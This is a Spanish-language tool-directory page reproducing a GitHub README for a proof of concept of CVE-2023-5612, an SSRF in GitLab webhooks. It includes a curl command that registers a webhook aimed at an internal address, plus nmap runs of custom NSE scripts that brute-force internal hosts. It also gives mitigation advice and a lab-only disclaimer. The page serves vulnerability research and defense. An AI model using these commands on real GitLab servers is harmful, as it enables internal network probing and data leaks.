Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Review.CVE-2023-5612 — Análisis mediante script CVE-2023-5612 | Kitploit
Herramientas/GitHubGitHub/topskiypavelqwertygang/review.cve-2023-5612
ReconocimientoMapeo de RedesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubtopskiypavelqwertygang/review.cve-2023-5612

Review.CVE-2023-5612

Análisis mediante script CVE-2023-5612

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
45hace 1 añoAún no revisado
Compartir

CVE-2023-5612 – SSRF en GitLab mediante URL de Webhook (PoC y análisis)

📌 Resumen del CVE

  • CVE-ID: CVE-2023-5612
  • Severidad: Alta (CVSS: 8.1, puntuación base)
  • Tipo: Server-Side Request Forgery (SSRF)
  • Componente: Webhooks de GitLab CE/EE
  • Versiones afectadas: GitLab CE/EE < 16.2.7, 16.3 < 16.3.4, 16.4 < 16.4.1

🧠 Descripción

Una vulnerabilidad de SSRF en GitLab CE/EE permite a los atacantes con acceso válido de Maintainer de proyecto enviar solicitudes especialmente diseñadas a servicios internos arbitrarios mediante URL de webhook maliciosas. Su explotación permite escanear la red interna, filtrar metadatos o realizar pivoting hacia otros sistemas.


✅ Condiciones de explotación

  • El atacante tiene acceso maintainer al proyecto
  • GitLab no cuenta con un filtrado estricto ni validación de las URL de los webhooks

⚙️ Pasos del PoC (manual)

root@kitploit:~
curl -s --header "PRIVATE-TOKEN: <TOKEN>" \
     --data-urlencode "url=http://127.0.0.1:8888" \
     http://<gitlab-host>:8080/api/v4/projects/<project_id>/hooks

🧱 Entorno y configuración

root@kitploit:~
- Kali Linux dentro de una máquina virtual desplegada específicamente para las pruebas
- Instancia vulnerable de GitLab CE levantada mediante Docker (puerto 8080)
- Dentro de GitLab:
- Se creó un proyecto de prueba
- Se generó un Personal Access Token (glpat-...) con permisos de Maintainer
- Se levantó un servicio HTTP mínimo en 127.0.0.1:8888 como objetivo interno del SSRF

🧠 Metodología

root@kitploit:~
- Confirmación manual de la vulnerabilidad mediante curl (ver PoC)
- Creación de scripts NSE personalizados:
gitlab-ssrf.nse: verificación puntual de SSRF
gitlab-ssrf-brute.nse: fuerza bruta automática de direcciones internas
- Pruebas con nmap -d y --script-trace para analizar el comportamiento de la API y registrar los resultados
- Obtención de una respuesta 401 Unauthorized del servicio interno, lo que indica un SSRF exitoso
- Una solicitud exitosa devolverá `201 Created` o un error del tipo `401 Unauthorized`, lo que indica acceso por SSRF.

🛠 Script NSE (activación manual)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

🧪 Script NSE (fuerza bruta de URLs internas)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf-brute.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

📈 Conclusión

root@kitploit:~
Durante el trabajo sobre la vulnerabilidad **CVE-2023-5612** se reprodujo un escenario de ataque SSRF exitoso con acceso a direcciones internas a través de la API de GitLab CE. Esto demuestra lo importante que es restringir las capacidades de los webhooks e implementar la validación de URL en el lado del servidor.

🎯 Objetivo cumplido:

  • SSRF confirmado
  • Toolkit NSE implementado
  • El proyecto está documentado y abierto a la comunidad

📂 Estructura del repositorio

root@kitploit:~
.
├── gitlab-ssrf.nse             # Script NSE para verificación manual de SSRF
├── gitlab-ssrf-brute.nse       # Script NSE de fuerza bruta para escanear hosts/puertos internos
├── screenshots/                # Capturas de la ejecución del PoC y de la confirmación de la vulnerabilidad
└── README.md                   # Este archivo

🖼 Capturas de pantalla

  • ✅ SSRF exitoso que devuelve 401 Unauthorized
  • 📜 Registros de nmap con la ejecución del script
  • 📦 Adición del webhook mediante la API

⚠️ Mitigación

  • Actualiza GitLab a >= 16.2.7 / 16.3.4 / 16.4.1
  • Restringe el HTTP saliente mediante un firewall de egreso
  • Usa allow-lists internas para los webhooks

🧠 Autor y contacto

Pavel Topskiy
GitHub • Analista de Seguridad, Analista de Red Team


📅 Cronología

  • Junio de 2025: Análisis del PoC y de la vulnerabilidad
  • 5 de junio de 2025: Desarrollo del script NSE personalizado y de las pruebas

🔐 Descargo de responsabilidad

Todas las pruebas se realizaron en entornos de laboratorio aislados y sobre versiones intencionadamente vulnerables. No utilices esto contra sistemas no autorizados. Respeta los principios del hacking ético.

Descargar herramienta